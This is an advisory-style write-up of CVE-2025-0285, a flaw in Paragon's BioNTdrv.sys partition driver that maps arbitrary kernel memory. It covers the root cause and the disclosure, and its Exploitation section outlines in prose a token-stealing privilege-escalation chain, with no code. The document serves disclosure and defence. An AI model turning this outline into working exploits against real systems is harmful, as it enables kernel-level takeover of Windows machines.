CVE-2025-0285
BioNTdrv.sys -- arbitrary kernel memory mapping allows elevation of privilege
Summary
| Field | Value |
|---|---|
| Driver | BioNTdrv.sys (Paragon Partition Manager) |
| Vulnerability Class | Arbitrary Memory Mapping |
| Exploited ITW | No |
| Vendor | Paragon Software |
Root Cause
The Paragon Partition Manager ships with a kernel driver, BioNTdrv.sys, that provides low-level disk management capabilities. To perform its partition operations, the driver needs kernel-level access to disk structures and memory. However, the driver's IOCTL interface goes far beyond what partition management requires.
One of the exposed IOCTLs maps arbitrary kernel virtual memory into the calling process's user-mode address space. The driver accepts a kernel virtual address and a size from the user-mode caller, creates a mapping, and returns it without any validation. There is no check on the caller's privilege level, no verification that the target address is within a safe range, and no restriction on what memory regions can be mapped.
This is one of five vulnerabilities in BioNTdrv.sys reported simultaneously (alongside CVE-2025-0286, CVE-2025-0287, CVE-2025-0288, and CVE-2025-0289). The cluster of five vulnerabilities suggests the driver was designed with kernel security boundaries as an afterthought, exposing powerful primitives through multiple IOCTLs without any access control.
CERT/CC coordinated the disclosure under VU#726882, and Microsoft added BioNTdrv.sys to the recommended driver block rules.
Exploitation
The attacker loads BioNTdrv.sys (or finds it already installed on a system running Paragon Partition Manager) and opens a handle to the device. The memory mapping IOCTL provides direct read/write access to any kernel virtual address.
With kernel memory mapped into user space, the attacker can scan for EPROCESS structures, read the SYSTEM process token, and overwrite the current process's token. The entire exploitation chain is deterministic and requires no race conditions, heap grooming, or information leaks. The driver itself provides everything needed for privilege escalation in a single IOCTL.
Exploitation Primitive
Open device handle -> memory mapping IOCTL
-> arbitrary kernel memory R/W -> SYSTEM
Broader Significance
The five-vulnerability cluster in BioNTdrv.sys is a case study in how third-party disk management software creates kernel attack surface. Partition managers need kernel-level access for legitimate operations, but the boundary between "necessary kernel access for disk operations" and "arbitrary kernel memory manipulation" must be carefully drawn. Paragon's driver drew no boundary at all, exposing the full kernel address space to any caller. The CERT/CC coordination and Microsoft blocklist addition demonstrate the multi-party response needed when a widely-installed third-party driver turns out to be a BYOVD goldmine.